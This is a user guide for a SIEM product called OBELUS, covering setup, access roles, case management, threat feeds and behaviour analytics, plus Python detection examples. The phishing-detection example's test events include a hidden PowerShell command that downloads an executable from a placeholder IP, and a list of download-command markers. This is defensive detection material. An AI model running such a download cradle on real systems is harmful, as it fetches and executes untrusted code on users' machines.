Cisco | DDoS Mitigator | IDS/IPS | Syslog
 | Identity Services Engine | Other | Syslog
 | IOS Firewall | Firewall/Network Switches and Routers | Syslog
 | IOS IDS | IDS/IPS/Network Switches and Routers | Syslog
 | IronPort Email Security | Email Security | Syslog
 | IronPort Web Security Appliance | Web Content/Filtering/Proxies | Syslog
 | Open TACACS+ | Authentication | Syslog
 | PIX IDS | IDS/IPS/Network Switches and Routers | Syslog
 | PIX/ASA/FWSM | Firewall/IDS/IPS | Syslog
 | Secure ACS | IDS/IPS | Syslog
 | NetScaler | Web Content/Filtering/Proxies | Syslog
 | Secure Gateway | Web Content/Filtering/Proxies | Syslog
CyberArk | Enterprise Password Vault | Application | Syslog
 | Privileged Identity Management Suite - CEF | Application | Syslog
 | Privileged Threat Analytics | UBA | Syslog
Cyberoam | Cyberoam UTM and NGFW | UTM/Firewall | Syslog
Cylance | Cylance PROTECT | Antivirus | Syslog
Dell | SonicWALL SonicOS | Firewall | Syslog
FireEye | FireEye Malware Protection | Antivirus/Malware | Syslog
Fidelis | Fidelis Network | Security Appliance | Syslog
Fortinet | FortiGate Antivirus | Antivirus | Syslog
 | FortiGate Firewall | Firewall | Syslog
 | FortiGate IDS | IDS/IPS | Syslog
Imperva | WAF | Web Content | Syslog
Juniper Networks | NetScreen Firewall | Firewall | Syslog
 | NetScreen IDP | IDS/IPS | Syslog
 | JUNOS Router | Network Switches and Routers | Syslog
Kaspersky | Malware Protection | Antivirus | SQL
Malwarebytes | Malware Protection | Antivirus | SQL
Microsoft | Microsoft Active Directory | All Type | WMI
 | Microsoft Exchange Server 2010 | | WMI
 | Microsoft SQL Server | All Type | WMI
Oracle | Oracle Database | | Syslog
 | Oracle Audit | Database | Syslog
Palo Alto Networks | Firewall | Firewall | Syslog
Proofpoint | Email Security Gateway | Application | Syslog
OBELUS SIEM out-of-the-box (OOTB) log types: OBELUS SIEM has robust out-of-the-box support for the log sources listed in the diagram.
Figure 22: OBELUS OOTB log source support.
Managed Security Service Providers (MSSP)
The use of managed security service providers (MSSPs) continues to trend upward as demand for external support grows. Smaller and mid-sized organizations can now keep up with the dynamic threat landscape, while larger enterprises use managed security services to maximize their capabilities. Motivations for seeking third-party support include a lack of internal resources to manage a SIEM deployment and perform real-time alert monitoring, or a lack of expertise to expand into new use cases.
OBELUS can onboard multiple clients on a single platform.
Follow the instructions below to create or edit organizations.
Create organization
1. Go to Settings > Users & Authentication > Manage Users
2. Click the Organizations tab. It lists the child organizations under your organization.
3. Click New Organization to create a new organization.
4. Enter the name and upload a logo
5. Click Save to create the organization.
Figure 23: Create Organization
Provision Organization
1. Go to Settings > Users & Authentication > Manage Users
2. Click the Organizations tab. It lists the child organizations under your organization.
3. Select the organization that you want to provision.
4. Click Provision
5. Once provisioning is complete, the users assigned to the company can log in and perform their operations.
Figure 24: Manage Users
Role Based Access Control (RBAC)
Role-based access control provides flexible and effective tools that you can use to protect OBELUS data.
OBELUS masks data from the user much as a relational database manages role-based access control. In some cases total segmentation of data may be necessary; in others, controlling searches and results at the presentation layer may meet your security needs.
Consider your use cases when deciding how to set up your configurations and whether role-based access might fit your needs. For example:
• For extremely sensitive data, where even allowing access to a system that might have sensitive data incurs legal risk, consider installing and configuring more than one instance of OBELUS, and then configuring each instance with the data for the appropriate audience.
• When intentionally or unintentionally exposing sensitive data to the wrong user might incur legal ramifications, consider creating indexes specifically for privileged and non-privileged accounts and assigning them to roles created for each level of access.
• When there are security concerns but not so much legal risk, you can restrict access using Apps. For example, you can create an App with static dashboards and assign roles with lower clearance to those dashboards, limiting the type of information the user assigned to the role may access.
• Field encryption (an optional feature), search exclusions and field aliasing to redacted data are also good ways to tighten a limited search case. If you have a limited search case and can only search some specific data in a shared index, you can restrict shared reports, restrict ad hoc searches and funnel summary indexing into a secured index.
By default OBELUS provides two roles:
1. Administrator: has access to all organizations and can enable or disable features for organizations.
2. Company Admin: administers their own organization and its sub-organizations and cannot enable or disable features for organizations.
Role Capabilities
Capability | Description
Add User | Permission to create users
View User | Permission to view users
Delete User | Permission to delete users
Update User | Permission to update users
Add Groups | Permission to add groups
Update Groups | Permission to update groups
View Groups | Permission to view groups
Delete Groups | Permission to delete groups
Add Roles | Permission to add roles
Update Roles | Permission to update roles
View Roles | Permission to view roles
Delete Roles | Permission to delete roles
Add Dashboards | Permission to add dashboards
Update Dashboards | Permission to update dashboards
View Dashboards | Permission to view dashboards
Delete Dashboards | Permission to delete dashboards
Add Visualizations | Permission to add visualizations
Update Visualizations | Permission to update visualizations
View Visualizations | Permission to view visualizations
Delete Visualizations | Permission to delete visualizations
Search Console | Permission to view historical search
Add Rules | Permission to add rules
Update Rules | Permission to update rules
View Rules | Permission to view rules
Delete Rules | Permission to delete rules
Add Events | Permission to add events
Update Events | Permission to update events
View Events | Permission to view events
Delete Events | Permission to delete events
Manage Field Extraction Rules | Permission to create/view/update/delete log parsers
Add Asset | Permission to add assets
View Asset | Permission to view assets
Update Asset | Permission to update assets
Delete Asset | Permission to delete assets
Enable/Disable Agents | Permission to enable/disable agents
Add Organization | Permission to add organizations
Update Organization | Permission to update organizations
Delete Organization | Permission to delete organizations
View Organization | Permission to view organizations
Create Case | Permission to create cases
View Case | Permission to view cases
Update Case | Permission to update cases
Reopen Case | Permission to reopen cases
Create Global Space | Permission to create a public space
View Global Space | Permission to view a public space
Update Global Space | Permission to update a public space
Delete Global Space | Permission to delete a public space
Promote Space | Permission to promote a space from private to public
Create Role
1. Go to Settings > Users & Authentication > Manage Users
2. Click the Roles tab. You can see the list of roles under your organization
Figure 25: Manage Users create role
3. Click New Role
Figure 26: Create Role
4. Enter the role name and select permissions on the left
5. Under Granted To select either Users or Groups
6. Select the users or groups to add to the role
7. Click on save button to persist changes
Create Users
1. Go to Settings > Users & Authentication > Manage Users
2. Click the Users tab
3. Click New User and enter Email, First Name, Middle Name, Last Name, Default Company and Assign Company.
4. Click Save Changes to persist the changes
Edit Users
1. Go to Settings > Users & Authentication > Manage Users
2. Click the edit link in the user table
3. Edit the first name, last name and company details.
4. Click Save Changes to persist the changes.
Incident Response Plan
OBELUS comes with built-in Incident Response Plans (IRPs) to help security analysts respond to cyber threats faster and more efficiently. The platform also lets you customize and edit a response plan to fit your requirements.
1. Log in with a valid username and password
2. Click the Settings option on the right
3. Select Incident Response Plan from the left panel
Figure 27: Incident Response Plan
4. To create a new IRP click "New IRP", or select the dotted option to view, clone or edit an existing one.
5. Use the right and left panels to create the template, flow, design, colour and so on, then save your work.
Figure 28: Incident Response Plan
Case Management
The Case Management platform is fully integrated into Advanced Analytics, enabling you to organize and document analysis and artifacts. It also helps analysts collect, distribute and analyze the security alerts associated with events or incidents more effectively and efficiently, so that an incident investigation is closed with the right data, artifacts and analysis.
1. Log in with a valid username and password
2. Click the "Cases" tab on the header bar
3. View the cases by time, status, age and priority
4. To open a case, select it and click its Case Title
Creating a case for an incident:
1. Analysts can create a case for incidents that need further investigation directly from the Alerts tab.
2. Select the alert and click the "Add to Case" option on the right.
Figure 30: Add Alert to Case
Figure 29: Cases Dashboard.
3. You can add the alert to an existing case or create a new case.
Figure 31: Create New Case
4. Alternatively, create a new case by filling in the case details.
5. Once the case is created, click the Cases tab to view it and click the Case Title to open it.
6. The page shows the Case Details, Age, Evidence, IRP, Alerts, Assignee, Owner, Attachments and so on.
Figure 32: Case Detail Page
7. Every alert/case has an IRP (Incident Response Plan) associated with it, which helps the analyst investigate the incident effectively and efficiently.
Investigation Graph
The Investigation Graph helps analysts triage and analyze alerts by clicking through the nodes of a graph built from correlated information and threat context. The scenario below shows how this feature helps to analyze an alert.
Use Case: Phishing E-Mail
Phishing is a type of online scam where attackers send an email that appears to be from a legitimate company and ask you to
provide sensitive information. This is usually done by including a link that will appear to take you to the company’s website to
fill in your information – but the website is a clever fake and the information you provide goes straight to the crooks behind the
scam.
The term ’phishing’ is a spin on the word fishing, because criminals are dangling a fake ’lure’ (the email that looks legitimate, as
well as the website that looks legitimate) hoping users will ’bite’ by providing the information the criminals have requested –
such as credit card numbers, account numbers, passwords, usernames, and more.
Attack Execution: the attack is executed in the following steps:
• User receives an email that has a link in it.
• User clicks the link.
• User connects to the URL with default browser
• Other actions are performed (file download, running malicious code).
Configure Events: the following events were created to detect this kind of attack.
• Email Download by PowerShell (checks whether any content was downloaded by powershell.exe)
• Network Connection (a process establishes a network connection)
• File Created (monitors whether a new file was created)
• File Create Stream (logs the hash of the contents of the file to which the stream is assigned)
Configured Notable Events/Rules
The following notable event was created to detect the phishing use case. The rule looks for a PowerShell process started with a command that downloads a file from the internet, correlated with the network connection and the file creation that belong to the same download. If all conditions are met, it raises an alert.
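As an added example (not the OBELUS rule itself), the Python below implements the chain described above as a stateful sequence detector over constructed endpoint events: a PowerShell process started with a download command, followed on the same host by a network connection and then a file creation by PowerShell, all within a short window. The event field names, the list of download command fragments and the window length are assumptions made for the example; the destination IP address and file name are placeholders.

```python
from datetime import datetime, timedelta

POWERSHELL = "powershell.exe"
# Command-line fragments that indicate a download. The list is an assumption
# for this example and is deliberately not exhaustive.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "iwr ", "wget ", "curl ", "start-bitstransfer")
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed endpoint events (not from the original page), already parsed
# into fields. The event types mirror the events defined above.
SAMPLE_EVENTS = [
    {"ts": "2020-03-01T09:00:00", "host": "ws-001", "type": "process_create", "image": PS_IMAGE,
     "cmdline": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://203.0.113.5/65536.exe','C:\\Users\\u\\65536.exe')\""},
    {"ts": "2020-03-01T09:00:01", "host": "ws-001", "type": "network_connection",
     "image": PS_IMAGE, "dst_ip": "203.0.113.5"},
    {"ts": "2020-03-01T09:00:03", "host": "ws-001", "type": "file_created",
     "image": PS_IMAGE, "target": r"C:\Users\u\65536.exe"},
    # Benign PowerShell on another host: no download command, so no alert.
    {"ts": "2020-03-01T09:30:00", "host": "ws-002", "type": "process_create",
     "image": PS_IMAGE, "cmdline": "powershell Get-Process"},
    {"ts": "2020-03-01T09:30:02", "host": "ws-002", "type": "network_connection",
     "image": PS_IMAGE, "dst_ip": "198.51.100.9"},
]


def is_powershell(event):
    return event.get("image", "").lower().endswith(POWERSHELL)


def is_powershell_download(event):
    cmd = event.get("cmdline", "").lower()
    return is_powershell(event) and any(marker in cmd for marker in DOWNLOAD_MARKERS)


def detect_phishing_chain(events, window_seconds=60):
    """Per host, look for: PowerShell download command -> network connection by
    PowerShell -> file created by PowerShell, in that order and within
    window_seconds of the first stage. Returns one alert per completed chain."""
    chains = {}   # host -> {"start": datetime, "stage": int, "evidence": [events]}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        now = datetime.fromisoformat(ev["ts"])
        host = ev["host"]
        chain = chains.get(host)
        if chain and now - chain["start"] > timedelta(seconds=window_seconds):
            chains.pop(host)   # too slow to be one download; drop the partial chain
            chain = None
        if ev["type"] == "process_create" and is_powershell_download(ev):
            chains[host] = {"start": now, "stage": 1, "evidence": [ev]}
        elif chain and chain["stage"] == 1 and ev["type"] == "network_connection" and is_powershell(ev):
            chain["stage"] = 2
            chain["evidence"].append(ev)
        elif chain and chain["stage"] == 2 and ev["type"] == "file_created" and is_powershell(ev):
            chain["evidence"].append(ev)
            alerts.append({"host": host,
                           "dst_ip": chain["evidence"][1]["dst_ip"],
                           "file": ev["target"],
                           "cmdline": chain["evidence"][0]["cmdline"]})
            chains.pop(host)
    return alerts


if __name__ == "__main__":
    for alert in detect_phishing_chain(SAMPLE_EVENTS):
        print(alert)
```

Matching on the image name powershell.exe is the weak point of a rule like this: a renamed binary, pwsh.exe, or a download hidden behind -EncodedCommand all slip past it, so a production version should decode encoded commands and key on the original file name reported in the process event rather than on the path alone.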
Investigation for Alert
1. Analysts can create an investigation for incidents that need further investigation directly from the Alerts tab.
2. Select the alert and click the "Add to Investigation" option on the right.
Figure 33: Investigation Graph
3. Add the alert to the investigation by filling in the investigation details.
Figure 34: Configure New Investigation
4. Select the investigation created from the “Investigation Tab”.
5. The investigation shows the attacker path and what actions a particular adversary performed.
6. Right Panel displays the Indicators and Observables.
Figure 35: Investigation Graph
The attacker path above shows that the file 65536.exe was downloaded by PowerShell from the IP address 101.99.77.132, which the threat intel sources flag as a threat IP. The graph also shows the passive DNS records attached to the IP and any malware hashes associated with it.
If you click any indicator, it shows the geolocation, IP reputation and WHOIS information.
Report Generation Tool
Generate reports according to your requirements and business needs. Built-in reports save users and analysts time; reports can be generated on demand and the template customized as required.
1. Log in with a valid username and password
2. Click the "Reports" tab on the header bar
3. Click "Create Report Template"
4. Enter the report information in the Report Template and select the compliance type from the drop-down
5. Scroll down the window to set the graphs and filter conditions
6. Click Create to save the report
7. To generate the report for preview, click Generate Report
8. To print the report, click Print
Figure 36: OBELUS SIEM Sample Report.
9. To edit the report, click Edit Report
10. Click Schedule Reports to schedule the report
Threat Intelligence
The Threat Intelligence framework is a mechanism for consuming and managing threat feeds, detecting threats, and alerting.
The framework consists of modular inputs that collect and sanitize threat intelligence data, lookup generation searches to
reduce data to optimize performance, searches to correlate data and alert on the results, and data modeling to accelerate and
store results. This framework also includes a number of audit dashboards that allow introspection into threat intelligence
retrieval, normalization, persistence, and analysis.
What is OSINT: OSINT stands for open source intelligence, which refers to any information that can legally be gathered from free, public
sources about an individual or organization. In practice, that tends to mean information found on the internet, but technically
any public information falls into the category of OSINT whether it’s books or reports in a public library, articles in a newspaper
or statements in a press release.
Why OSINT:
By gathering publicly available sources of information about a particular target an attacker – or friendly penetration tester –
can profile a potential victim to better understand its characteristics and to narrow down the search area for possible vulnerabilities.
Without actively engaging the target, the attacker can use the intelligence produced to build a threat model and develop a plan of
attack. Targeted cyber-attacks, like military attacks, begin with reconnaissance, and the first stage of digital reconnaissance is passively
acquiring intelligence without alerting the target.
Gathering OSINT on yourself or your business is also a great way to understand what information you are gifting potential attackers.
Once you are aware of what kind of Intel can be gathered about you from public sources, you can use this to help you or your security
team develop better defensive strategies. What vulnerabilities does your public information expose? What can an attacker learn that
they might leverage in a social engineering or phishing attack?
Configured OSINT Feeds: the following OSINT feeds are configured in OBELUS.
Feed Name | Feed Type | Indicator Type
abuseFree_zeustrackerdomain | URL | DOMAIN
abuseFree_zeustrackerDOMAIN_domain | URL | DOMAIN
banjori-domlist | URL | DOMAIN
botvrij.eu | URL | DOMAIN
dshield.org | URL | DOMAIN
dshield.org_domain | URL | DOMAIN
gist.githubusercontent_domain | URL | DOMAIN
malc0de.com_domain | URL | DOMAIN
malwaredomainlist_domain | URL | DOMAIN
ransomwaretracker_domain | URL | DOMAIN
abuseFree_zeustrackerIP_ip | URL | IP
bambenekconsulting-ip | URL | IP
binarydefense-ip | URL | IP
dan.me.uk_ip | URL | IP
danger.rulez.sk_ip | URL | IP
emergingthreats-ip | URL | IP
feodotracker.abuse.ch_ip | URL | IP
lists.blocklist.de | URL | IP
New Feed | URL | IP
sblam.com-ip | URL | IP
spamhaus_DROP_ip | URL | IP
spamhaus_DROPV6_ip | URL | IP
spamhaus_EDROP_ip | URL | IP
threatcrowd-ip | URL | IP
extra feed | API | SHA1
openphis_url | URL | URL
vxvault_url | URL | URL
Use the following steps to view, create and update feeds.
Create Threat Feed:
1. Go to Manage Data > Settings > Feeds > Manage Feeds.
2. Click Configure Feed.
3. Select the owner of the feed.
4. Enter the feed name
5. Select the indicator type
6. Select the feed type: URL, API, FILE or TAXII. This defines the source of the feed.
7. Click Next.
8. Enter the URL of the feed.
9. Enter the feed trust score, the level of trust given to the feed.
10. Enter a unique source name
11. Enter the delimiter or format, for example CSV or JSON
12. Select the feed scheduler frequency, for example every hour
13. Click Next.
14. Enter tags for unique identification.
15. Select the TLP.
16. Click Save to persist the changes.
Edit Threat Feed:
1. Go to Manage Data > Settings > Feeds > Manage Feeds.
2. In the table, click Edit on the feed you want to edit.
3. Change the owner, feed name, indicator type and feed type.
4. Change the URL if needed.
5. Change the feed trust score and source name
6. Click Next to change the tags or TLP
7. Click Save to persist the changes.
Delete Threat Feed:
1. Go to Manage Data > Settings > Feeds > Manage Feeds.
2. In the table, click Delete on the feed you want to delete
Manage Indicators of Compromise
What Are Indicators of Compromise (IOC): Indicators of Compromise (IOCs) are pieces of forensic data, such as system log entries or files, that identify
potentially malicious activity on a system or network.
Examples of an IOC include unusual network traffic, unusual privileged user account activity, login anomalies, increases in
database read volume, suspicious registry or system file changes, unusual DNS requests and Web traffic showing non-human
behavior. These and other unusual activities allow security teams monitoring the systems and networks to spot malicious
actors earlier in the intrusion detection process.
Documenting IOC and their associated threats allows the industry to share this information and improve incident response
and computer forensics. For this reason, efforts are being made by groups like OpenIOC, STIX and TAXII among others to
standardize IOC documentation and reporting.
The following steps to create/update/upload IOC’s.
Create Indicator:
1. Go to Manage Data > Settings > Feeds > Indicators.
2. The indicators table lists Feed Name, Type, First Seen, Last Seen, Feed Source, Indicator and Status.
3. Click on the Create button.
4. Select the Type (Whitelist/Blocklist).
5. Select the Indicator Type (IP, Domain, Hash, Email).
6. Enter the indicator value.
7. Enter the feed trust score.
8. Enter the Reason.
9. Click on the Save button to persist the changes.
Whitelisting: In more and more environments, IOCs are used as a blacklist, and security tools can block access to resources based on
IP addresses, domains, file hashes, etc. But every security control also implements a "Whitelist" to prevent (as much
as possible) false positives.
IP Whitelisting:
IP Whitelisting allows you to create lists of trusted IP addresses or IP ranges from which your users can access your domains.
An IP whitelist is a security feature often used for limiting and controlling access to trusted users only. IP Whitelisting can be set
via the Good Data API.
Bulk White/Blocklist Indicator:
1. Go to Manage Data > Settings > Feeds > Indicators.
2. Select the indicators that you want to whitelist or blocklist.
3. Click on the Whitelist or Blocklist button.
Bulk Upload Indicator:
1. Go to Manage Data > Settings > Feeds > Indicators.
2. Click on the Add file button and upload the CSV file containing the indicators.
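As an added illustration (not part of the OBELUS documentation or product code), the following Python sketch shows how a bulk CSV of indicators of the types listed above (IP, Domain, Hash, Email) can be validated, filtered by trust score and split into blocklist and whitelist tables, with whitelist entries suppressing blocklist hits as described under Whitelisting. The CSV column names, the trust threshold and the event field layout are assumptions, not the product's documented format.

```python
import csv
import ipaddress
import re

# Constructed sample feed in an assumed CSV layout (not the product's documented upload format).
FEED_CSV = """list,indicator_type,indicator,trust_score,tlp
blocklist,ip,203.0.113.45,90,amber
blocklist,domain,updates.bad-cdn.example,70,green
blocklist,hash,a3f1a3f1a3f1a3f1a3f1a3f1a3f1a3f1,95,red
blocklist,email,billing@bad-cdn.example,60,green
blocklist,ip,198.51.100.7,30,green
whitelist,ip,203.0.113.45,100,white
blocklist,ip,not-an-ip,80,green
"""

PATTERNS = {  # domain label rules; MD5/SHA-1/SHA-256 hex digests; minimal e-mail shape
    "domain": r"([a-z0-9-]{1,63}\.)+[a-z]{2,63}",
    "hash": r"[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}",
    "email": r"[^@\s]+@[^@\s]+\.[^@\s]+",
}

def valid_indicator(kind, value):
    """Reject malformed values so one bad feed row cannot poison the match tables."""
    if kind == "ip":
        try:
            ipaddress.ip_address(value)
            return True
        except ValueError:
            return False
    return kind in PATTERNS and re.fullmatch(PATTERNS[kind], value) is not None

def load_feed(text, min_trust=50):
    """Return (blocklist, whitelist, rejected); blocklist rows below min_trust are dropped."""
    block, allow, rejected = {}, set(), []
    for row in csv.DictReader(text.splitlines()):
        key = (row["indicator_type"].lower(), row["indicator"].strip().lower())
        if not valid_indicator(*key):
            rejected.append(key[1])
        elif row["list"] == "whitelist":
            allow.add(key)
        elif int(row["trust_score"]) >= min_trust:
            block[key] = {"trust": int(row["trust_score"]), "tlp": row["tlp"]}
    return block, allow, rejected

def match_event(event, block, allow):
    """Blocklist hits for one event (field name == indicator type); a whitelist entry wins."""
    keys = [(kind, value.lower()) for kind, value in event.items()]
    return [(k, v, block[(k, v)]["trust"]) for k, v in keys if (k, v) in block and (k, v) not in allow]
```

Running `load_feed(FEED_CSV)` keeps four blocklist entries, drops the low-trust address and rejects the malformed one; an event carrying the whitelisted address together with the listed domain yields a hit on the domain only.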
Threat Intel Dashboard
Threat Hunting
Threat hunting is the practice of proactively searching for cyber threats that are lurking undetected in a network. Cyber threat
hunting digs deep to find malicious actors in your environment that have slipped past your initial endpoint security defenses.
After sneaking in, an attacker can stealthily remain in a network for months as they quietly collect data, look for confidential
material, or obtain login credentials that will allow them to move laterally across the environment.
Once an adversary is successful in evading detection and an attack has penetrated an organization’s defenses, many
organizations lack the advanced detection capabilities needed to stop the advanced persistent threats from remaining in the
network. That’s why threat hunting is an essential component of any defense strategy.
Threat Hunting Methodologies: Threat hunters assume that adversaries are already in the system, and they initiate investigation to find unusual behavior that
may indicate the presence of malicious activity. In proactive threat hunting, this initiation of investigation typically falls into
three main categories:
Hypothesis-driven investigation: Hypothesis-driven investigations are often triggered by a new threat that has been identified through a large pool of
crowdsourced attack data, giving insights into attackers' latest tactics, techniques, and procedures (TTP). Once a new TTP has been
identified, threat hunters will then look to discover whether the attacker's specific behaviors are found in their own environment.
Investigation based on known Indicators of Compromise or Indicators of Attack: This approach to threat hunting involves leveraging tactical threat intelligence to catalog known IOCs and IOAs associated with
new threats. These then become triggers that threat hunters use to uncover potential hidden attacks or ongoing malicious
activity.
Advanced analytics and machine learning investigations: The third approach combines powerful data analysis and machine learning to sift through a massive amount of information in
order to detect irregularities that may suggest potential malicious activity. These anomalies become hunting leads that are
investigated by skilled analysts to identify stealthy threats.
OBELUS comes preconfigured with all MITRE-based tactics and techniques, which are used for threat hunting.
Historic Log Search
OBELUS SIEM allows searching, viewing and interacting with the logs, as well as performing data analysis and visualizing the logs
in a variety of charts, tables and maps. Analysts can search logs faster and more effectively without having to write complex
query statements.
1. Log in with a valid username and password.
2. Click on the "Historical" search tab on the header bar.
3. Select the "Time range" option in the right corner and choose the duration of your search.
4. Select the "Add a filter" option, provide the value to be searched and hit the Search option.
5. Add fields and drill down into your results to investigate further.
6. Use the "Auto Refresh" option to set the refresh time of your current window.
7. To clear a search, click "New", "Clear Query" or "Delete Filter".
8. Save the search and share reports of trends or logs.
Figure 37: Historic Log search.
UBA
User behavior analytics (UBA) is the tracking, collecting and assessing of user data and activities using monitoring systems.
UBA technologies analyze historical data logs, including network and authentication logs collected and stored in log
management and SIEM systems. UBA systems are primarily intended to provide cyber security teams with actionable insights.
The OBELUS UBA Platform identifies security incidents using statistical analysis and predefined correlation rules. UBA can also detect suspicious behavior with
no predefined patterns or rules.
OBELUS UBA Platform effectively addresses all of the top 10 security use cases described below:
1. Compromised User Credentials
User account credentials are keys to legitimate access, and stolen credentials are the number one vector for data
breaches.
2. Privileged-user Compromise
A privileged user has authorized access to high-value resources, such as sensitive data or an authentication
system. When an attacker obtains privileged-user credentials, the attack can directly exploit high-value assets.
3. Executive Assets Monitoring
Monitors activities on executive computing assets such as the CEO's or CFO's laptop and helps build
asset and behavior models to identify unusual activities.
4. Compromised System/Host/Device Detection
It is very common for attackers to take control of systems, hosts or devices within an organizational network. The
UBA platform helps monitor several vectors, including user accounts, servers, network devices, non-trusted
communication sources, insecure protocols, and other signs of malicious behavior.
5. Insider Access Abuse
Detect when a user (privileged or not) is performing risky activities that are outside of their normal baseline.
6. Lateral Movement Detection
Behavioral analysis connects the dots between seemingly "unrelated" activities such as privilege escalation and suspicious
security rights granted to a normal user account.
7. Data Exfiltration Detection
Data exfiltration happens when sensitive data is illicitly transferred outside an organization. UBA monitors for
unusual amounts of network traffic over protocols that facilitate large data transfer compared to the baseline of a
user or machine transferring the data.
8. Account Lockouts
An account lockout disallows access to a user. This security feature aims to protect an account from anyone or
anything trying to guess the username and password. The UBA use case helps to automate the risk assessment process
and quickly notify on account risk.
9. Service Account Misuse
A service account is used instead of a normal system account to run specific application services. By employing its
behavioral analytics capabilities, the UBA solution automatically identifies service accounts and notifies on any
abnormal behavior.
10. Security Alert Investigation
The UBA dashboard and real-time alerts can dramatically improve the productivity of SOC analysts when paired with a modern
security information and event management solution such as OBELUS. OBELUS uses machine-built timelines to
offer a better interface for threat hunting, investigation and the incident response plan.
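To illustrate the per-account baseline idea behind the Data Exfiltration Detection and Service Account Misuse use cases above, here is an added Python example (not OBELUS code) that scores each account's daily egress volume against its own history rather than against a global threshold. The volumes, the 3-sigma threshold and the standard-deviation floor are constructed assumptions for the demonstration.

```python
from statistics import mean, pstdev

# Constructed daily egress volumes in MB per account over large-transfer protocols
# (e.g. SFTP, HTTPS uploads); in practice these would come from flow or proxy logs.
HISTORY = {
    "alice": [120, 135, 110, 128, 140, 131, 125],
    "svc_backup": [4200, 4100, 4350, 4180, 4260, 4220, 4300],
}
TODAY = {"alice": 2600, "svc_backup": 4310, "newhire": 900}

def baseline(samples, floor_ratio=0.05):
    """Mean and stdev of an account's own history; stdev is floored at a fraction
    of the mean so a near-constant account is not flagged for trivial jitter."""
    mu = mean(samples)
    return mu, max(pstdev(samples), floor_ratio * mu)

def score_exfiltration(history, today, z_threshold=3.0, min_days=5):
    """Map account -> (z_score or None, verdict). Only the account's own baseline is
    used: a busy service account is not penalised for its normal volume, while a
    low-volume user is flagged for moving an amount the service account moves daily."""
    findings = {}
    for account, volume in today.items():
        past = history.get(account, [])
        if len(past) < min_days:
            findings[account] = (None, "no_baseline")  # too little history to judge
            continue
        mu, sigma = baseline(past)
        z = (volume - mu) / sigma
        findings[account] = (round(z, 2), "anomalous" if z > z_threshold else "normal")
    return findings
```

With the sample data, alice's 2600 MB is hundreds of standard deviations above her baseline while svc_backup's larger 4310 MB is within its normal range, and the unknown account is reported as lacking a baseline rather than silently passed.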
Create Use Case for Successful User Logon Attempts:
1. Refer to Log On-boarding for shipping logs.
2. Go to Manage Data > Settings > New Events > Events > Right click for New Event.
3. New Events > Notables Events > Right click for New Event.
4. If the notable correlation filter conditions match the event fields, then an alert will be triggered.
5. Go to Manage Widget > Click New Widget > Enter Title & Choose the Events, Rules, Alerts, Cases > Click Preview.
6. Drag and drop the required fields > Select Widget type > Click on Preview.
7. Click on the Submit button to save the widget.
8. Go to Dashboards page > Right click for New Dashboard > Click on Edit Icon > Click Add icon to add various widgets.
9. UBA Dashboard
For queries and support:
India:Hi-Tech City Main Road, Gachibowli,Hyderabad 500032
USA: 4 Beacon Way, Jersey City, New Jersey, USA 07304
Contact/Email: +91 8309506180 [email protected]